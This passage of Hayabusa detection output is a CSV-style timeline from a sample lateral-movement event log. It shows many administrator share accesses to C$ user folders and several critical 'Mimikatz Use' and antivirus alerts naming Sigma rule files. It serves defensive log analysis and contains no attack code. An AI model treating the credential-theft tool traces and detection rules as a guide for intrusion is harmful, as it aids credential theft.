10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 